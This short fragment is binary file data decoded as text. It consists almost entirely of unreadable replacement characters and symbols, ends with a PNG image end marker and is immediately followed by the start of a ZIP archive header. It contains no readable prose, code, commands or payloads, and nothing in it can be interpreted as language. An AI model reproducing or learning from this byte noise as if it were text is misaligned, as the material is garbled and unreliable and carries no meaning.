�4�v����|���͏����� ���k�2t��D�N-Ҭ����1����g�W4x�C�f_QFT�YՋ����(���ݣ��?�|��KW6��l}~ニ�y�.FO�i�|����{������w���w�;����� Q�.zBpΪ�Rr$�=~t�G�N6.\x���_�;Nk��A59��+)#���?�~������?���[_���s��W �SwM�Ek�NB��ϋs�W�?��s�oo����-�><�}�ҋ"�M�|����9�WB(B4���݃ǟ{~w+�1,j����ω�F��S�����P��6��$�pe��٫/��`]��?��z�Γ͋�Y����Lmhl�Y�ʥl���Xo��o6��X��ı���}���`-����|�[����˵Aw�m��_�W��kמ}�o��M��/=���M��f��䃢;>Y�Yc�6.=�?:r����쯜���~`<W��S�\4N)��be��W2r��q;���^Obi��r������AO�~��`�;^�w�(���?x"�����A��W��X&�eS��D�R ��tZ�wZ�f�����s`&��R̨�}`����N��b] `2�v{}҅hB�,��1ҘF�H$��Qw��fEu�<���� �ɯ~ IEND�B`�PK ! ��aF F '